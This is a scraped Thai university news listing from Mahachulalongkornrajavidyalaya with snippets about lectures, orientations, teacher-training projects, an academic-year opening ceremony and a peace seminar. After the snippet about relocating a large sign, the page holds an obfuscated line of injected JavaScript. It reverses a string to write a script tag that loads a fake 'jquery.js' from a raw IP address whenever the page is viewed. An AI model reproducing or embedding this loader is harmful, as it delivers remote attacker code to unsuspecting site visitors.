พระศรีคัมภีรญาณบรรยายแก่นิสิตป.ตรีพระศรีคัมภีรญาณบรรยายแก่นิสิตป.ตรี

พระศรีคัมภีรญาณ, รศ.ดร., รองอธิการบดีฝ่ายวิชาการ บรรยายในรายวิชา ปรัชญาเบื้องต้น แก่นิสิตปริญญาตรีชั้นปีที่ ๑ เรียนรวมทั้ง ๔ คณะได้แก่ คณะพุทธศาสตร์ และคณะสังคมศาสตร์ เรียนที่ห้องเรียนเธียร์เตอร์ B คณะครุศาสตร์ และคณะมนุษยศาสตร์ เรียนที่ห้องเรียนเธียร์เตอร์ C บรรยายสลับกับ พระมหาสุรศักดิ์ ปจฺจนฺตเสโน, ดร. บรรยายในรายวิชา ประวัติศาสตร์พระพุทธศาสนา ในบ่ายวันนี้ (วันศุกร์ที่ ๑๒...

ปฐมนิเทศ ป.บัณฑิตศึกษา รุ่น ๒ ปฐมนิเทศ ป.บัณฑิตศึกษา รุ่น ๒

เช้าวันเสาร์ที่ ๒๗ มิถุนายน ๒๕๕๘ ได้มีพิธีปฐมนิเทศนักศึกษาใหม่หลักสูตรประกาศนียบัตรบัณฑิตศึกษา รุ่นที่ ๒ จำนวน ๑๕๐ คน โดยมีนักศึกษาบัณฑิตศึกษารุ่นที่ ๑ จำนวน ๑๕๐ คน เข้าร่วมรับน้องด้วย เริ่มตั้งแต่ ๐๙.๓๐ น. พระครูโสภณพุทธิศาสตร์ คณบดีคณะครุศาสตร์ ได้เดินทางถึงพิธี ณ หอประชุมเธียร์เตอร์โซนซี อาคารเรียนรวม มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย...

พระพรหมบัณฑิต บรรยาย”การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน”พระพรหมบัณฑิต บรรยาย”การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน”

          พระพรหมบัณฑิต ศ.ดร. อธิการบดี มจรบรรยาย.."การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน" จัดโดยสาขาการจัดการเชิงพุทธ คณะสังคมศาสตร์ มจร ในวันอังคารที่ ๙ กุมภาพันธ์ พ.ศ.๒๕๕๙ เวลา ๐๙.๓๐- ๑๑.๐๐ น. ณ ห้องประชุมเธียเตอร์โซน D อาคารเรียนรวม มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ท่านกล่าวว่า....คนที่ฉลาดจะเรียนรู้ข้อผิดพลาดของตนเอง แต่คนฉลาดกว่าจะเรียนรู้ข้อผิดพลาดของคนอื่น เราเรียนระดับมหาบัณฑิตต้องพิจารณาให้ดี...

โครงการฝึกประสบการณ์วิชาชีพครู คณะครุศาสตร์ ส่วนกลางโครงการฝึกประสบการณ์วิชาชีพครู คณะครุศาสตร์ ส่วนกลาง

<img data-id="931" src="http://pr.mcu.ac.th/wp-content/uploads/2015/07/11059383_2804301809679138_6019069170264688505_n.jpg" alt="11059383_2804301809679138_6019069170264688505_n" width="960" height="717" class="alignnone size-full wp-image-9 31" />โครงการฝึกประสบการณ์วิชาชีพครู คณะครุศาสตร์ ส่วนกลาง มหาจุฬาลงกรณราชวิทยาลัย ระหว่างวันที่ ๘ - ๙ กรกฎาคม ๒๕๕๘ ซึ่งมีผู้บริหาร คณาจารย์ เจ้าหน้าที่ ร่วมถึงพระนิสิตทุกรูปท่านเข้าร่วมโครงการ การนี้ได้รับเกียรติจากคณบดีคณะครุศาสตร์ พระครูโสภณพุทธิศาสตร์ ,ดร....

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย 

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย --------------------------------- ๒๖ มิถุนายน ๒๕๖๒ : พระธรรมปัญญาบดี นายกสภามหาวิทยาลัย เมตตาเป็นประธานในพิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย และกล่าวให้โอวาทแก่นิสิต ความว่า "คนไม่รู้หนังสือเหมือนกระบือตาบอด ไม่รู้ทิศเหนือทิศใต้ ไม่รู้หนองน้ำอยู่แห่งไหน ความพรากเพียร ขยันเรียนหนังสือ นั้นคือผู้ที่ประสบความสำเร็จในการศึกษาและการดำเนินชีวิต"ณ อาคาร มวก ๔๘ พรรษา มหาวชิราลงกรณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จ.พระนครศรีอยุธยา ...

โครงการ “๖๐ พรรษา สมเด็จพระเทพรัตนราชสุดาฯจิตรลดาบรรพชาภิวันทน์” โครงการ “๖๐ พรรษา สมเด็จพระเทพรัตนราชสุดาฯจิตรลดาบรรพชาภิวันทน์”

โครงการ "๖๐ พรรษา สมเด็จพระเทพรัตนราชสุดาฯจิตรลดาบรรพชาภิวันทน์" โครงการ "๖๐ พรรษา สมเด็จพระเทพรัตนราชสุดาฯจิตรลดาบรรพชาภิวันทน์" สามเณรจำนวนทั้งสิ้น ๑๔๔ รูป / ศีลจาริณี ๑๒๕ คน ทั้งหมดในระยะเวลา ๒๗ มีนาคม - ๑๙ เมษายน ๕๘ ภาคเช้า ตั้งเเต่เวลา ๐๗.๓๐ - ๐๙.๓๐ น....

พิธีปฐมนิเทศและสัมมนา ป.บัณฑิตพิธีปฐมนิเทศและสัมมนา ป.บัณฑิต

<img data-id="581" src="http://pr.mcu.ac.th/wp-content/uploads/2015/04/IMG_8592-2-300x200.jpg" alt="IMG_8592 (2)" width="300" height="200" class="alignnone size-medium wp-image-581" />พิธีปฐมนิเทศและสัมมนา พระครูสังฆรักษ์ กิตติพงษ์ สิริวฑฺฒโน รองคณบดีฝ่ายวิชาการ คณะครุศาสตร์ และผู้อำนวยการโครงการหลักสูตรประกาศนียบัตรบัณฑิตวิชาชีพครู เป็นประธานในพิธีเปิด พร้อมกล่าวให้โอวาทแก่นิสิต จากนั้นสัมมนาในหัวข้อ "เส้นทางสู่ความเป็นครูวิชาชีพ" โดย ดร.พรศรี ฉิมแก้ว ผู้อำนวยการสำนักมาตรฐานวิชาชีพ สำนักงานเลขาธิการคุรุสภา...

พระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง “ภาษาไทยกับการเผยแผ่พระพุทธศาสนา”

ขอเชิญชวนร่วมงานกิจกรรมเสริมหลักสูตร เสวนาทางวิชาการ โดยพระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง "ภาษาไทยกับการเผยแผ่พระพุทธศาสนา" และมีการเสวนาทางวิชาการเรื่อง ศิลปะการใช้ภาษาไทยสู่เส้นทางวิชาชีพ โดย กวีซีไรต์ชื่อดัง ๒ ท่านได้เเก่ ไพวรินทร์ ขาวงาม และ แดนอรัญ แสงทอง ปิดท้ายด้วย ทศพล หิมพานต์ ศิลปินลูกทุ่งชื่อดัง เเหล่สด ในวันที่ ๒๔ กุมภาพันธ์...

ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน...

กำลังขนย้ายป้ายใหญ่ ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน - โคราช ที่กำลังจะสร้างเร็วๆนี้ กองสื่อสารองค์กร รายงาน ภาพ : ผศ.ดร.อิทธิพล แก้วพิลา ผู้ช่วยอธิการบดีฝ่ายประชาสัมพันธ์ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

Peace Study seminar in “Peace in visions of religions”สันติศึกษาอภิปรายเรื่องสันติภาพในมุมมองศาสนา

๑๑ กรกฎาคม ๒๕๕๘ ช่วงบ่ายโดยเริ่มประมาณ ๑๓.๐๐ น. มีการอภิปรายเรื่อง "สันติภาพในมุมมองศาสนา" ซึ่งดำเนินรายการโดย พระครูพิพิธสุตาทร,ดร. อาจารย์ประจำวิชาสันติศึกษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ตัวแทนศาสนาคริสต์ นายมงซินญอร์แอนดูรว์ วิษณุธัญญอนันต์ รองเลขาธิการพระสังฆราชคาทอลิกแห่งประเทศไทย กล่าวว่า การเสวนาสร้างสันติที่แท้จริง...
X